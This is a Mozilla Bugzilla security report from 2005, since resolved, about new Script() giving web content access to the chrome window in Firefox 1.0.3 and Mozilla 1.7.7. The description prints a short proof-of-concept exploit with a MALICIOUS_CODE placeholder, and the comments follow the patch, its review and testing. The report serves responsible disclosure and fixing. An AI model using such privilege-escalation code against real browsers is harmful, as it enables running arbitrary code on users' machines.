Last Comment Bug 290908 - new Script() can access chrome window and run arbitrary code with chrome privilege
: new Script() can access chrome window and run arbitrary code with chrome priv...
Status: RESOLVED FIXED
[sg:fix] trunk version rolled into 28...
: fixed-aviary1.0.4, fixed1.7.8
Product: Core
Classification: Components
Component: Security (show other bugs)
: Trunk
: x86 Windows XP
: -- normal (vote)
: ---
Assigned To: Brendan Eich [:brendan]
:
Mentors:
Depends on: 281988
Blocks: sbb+
  Show dependency treegraph
 
Reported: 2005-04-18 21:37 PDT by moz_bug_r_a4
Modified: 2007-04-01 14:42 PDT (History)
13 users (show)
dveditz: blocking1.7.8+
asa: blocking‑aviary1.0.4+
bob: in‑testsuite?
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
testcase 1 (622 bytes, text/html)
2005-04-18 21:39 PDT, moz_bug_r_a4
no flags Details
testcase 2 (825 bytes, text/html)
2005-04-18 21:41 PDT, moz_bug_r_a4
no flags Details
testcase 3 (675 bytes, text/html)
2005-04-18 21:42 PDT, moz_bug_r_a4
no flags Details
fix (1.23 KB, patch)
2005-04-19 20:03 PDT, Brendan Eich [:brendan]
shaver: review+
dbaron: superreview+
asa: approval‑aviary1.0.4+
brendan: approval1.7.8+
Details | Diff | Splinter Review

Description moz_bug_r_a4 2005-04-18 21:37:23 PDT
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

Firefox 1.0.3:
missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another
event handler that can be used to make chrome access non-DOM JS property
(related to Bug 289961).

Mozilla 1.7.7:
hrefForClickEvent (in contentAreaClick.js) is the function that can be used to
make chrome access non-DOM JS property (related to Bug 290324).

There is the way to circumvent the fix represented in bug 289074 comment 79. The
code in Script object can access |arguments.callee.__parent__| that is the
chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome
privilege.

Exploit:

  var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';";

  var script = (function() {
    function x() { new Object(); }
    return new Script(scriptCode);
  })();

  document.body.__defineGetter__("type", script);
  var event = document.createEvent("Events");
  event.initEvent("PluginNotFound", true, true);
  document.body.dispatchEvent(event);

note:
It is important that how to create Script object. A, B, and C cause this error:
"Error: arguments is not defined". I don't know why D can access |arguments|.

A)
  var script = new Script(scriptCode);

B)
  var script = (function() {
    return new Script(scriptCode);
  })();

C)
  var script = (function() {
    function x() { "a"; }
    return new Script(scriptCode);
  })();

D)
  // any Object (window, document, new Array(), ...)
  var anyObj = new Object();
  var script = (function() {
    function x() { anyObj; }
    return new Script(scriptCode);
  })();


I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414


Reproducible: Always

Steps to Reproduce:
Comment 1 moz_bug_r_a4 2005-04-18 21:39:58 PDT
Created attachment 181108 [details]
testcase 1

for Firefox/1.0.3
Comment 2 moz_bug_r_a4 2005-04-18 21:41:36 PDT
Created attachment 181110 [details]
testcase 2

for Mozilla/1.7.7
Comment 3 moz_bug_r_a4 2005-04-18 21:42:52 PDT
Created attachment 181111 [details]
testcase 3

each of the ways to create Script object
Comment 4 Brendan Eich [:brendan] 2005-04-18 23:33:05 PDT
Testcase 1 is quite clever.  Another bounty for moz_bug_r_a4!

The patch in bug 290324 stops testcase 2.

Testcase 3 merely shows how to get an outer function invocation to have an
activation (Call in SpiderMonkey) object: nest an inner function that uses a
non-local identifier.

/be
Comment 5 David Baron :dbaron: ⌚️UTC+1 (mostly busy through August 4; review requests must explain patch) 2005-04-18 23:38:56 PDT
(In reply to comment #4)
> The patch in bug 290324 stops testcase 2.

No, it's the suite version of testcase 1.
Comment 6 Brendan Eich [:brendan] 2005-04-18 23:40:14 PDT
Er, dbaron points out that testcase 2 is for the suite.  It's the suite version
of testcase 1, I guess.

More tomorrow.  Thanks again, moz_bug_r_a4.

/be
Comment 7 georgi - hopefully not receiving bugspam 2005-04-19 13:20:05 PDT
the more js can interact with chrome, the more exploits.

especially if chrome executes js.
Comment 8 Brendan Eich [:brendan] 2005-04-19 20:03:32 PDT
Created attachment 181234 [details] [diff] [review]
fix
Comment 9 Brendan Eich [:brendan] 2005-04-20 01:50:32 PDT
Comment on attachment 181234 [details] [diff] [review]
fix

jst, feel free to review too.

/be
Comment 10 Mike Shaver (:shaver -- probably not reading bugmail closely) 2005-04-20 05:47:10 PDT
Comment on attachment 181234 [details] [diff] [review]
fix

r=shaver
Comment 11 Brendan Eich [:brendan] 2005-04-20 09:59:22 PDT
Thanks to bz for some productive discussion, part of which suggested this patch.

/be
Comment 12 David Baron :dbaron: ⌚️UTC+1 (mostly busy through August 4; review requests must explain patch) 2005-04-20 13:14:04 PDT
Comment on attachment 181234 [details] [diff] [review]
fix

I really don't understand this anymore, but sr=dbaron.
Comment 13 Brendan Eich [:brendan] 2005-05-09 12:21:31 PDT
Comment on attachment 181234 [details] [diff] [review]
fix

Got dveditz and drivers approval on IRC.  Checking in, with the same change to
obj_eval (indirect call error).

/be
Comment 14 Brendan Eich [:brendan] 2005-05-09 12:23:06 PDT
Checked into branches.

/be
Comment 15 sairuh (rarely reading bugmail) 2005-05-09 14:26:09 PDT
other than the attached test cases, are there other areas or things we could
test to ensure that this didn't regress anything? thanks!
Comment 16 Bob Clary [:bc:] 2005-05-11 17:17:41 PDT
In Firefox 1.0.4/winxp, I am getting the following for testcase 3:

A)
ReferenceError: arguments is not defined

B)
ReferenceError: arguments is not defined

C)
ReferenceError: arguments is not defined

D)
[object Object]

was D) supposed to be fixed?
Comment 17 Daniel Veditz [:dveditz] 2005-05-18 13:08:16 PDT
Clearing security flag from announced vulnerabilities fixed in Firefox
1.0.4/Mozilla 1.7.8

Note You need to log in before you can comment on or make changes to this bug.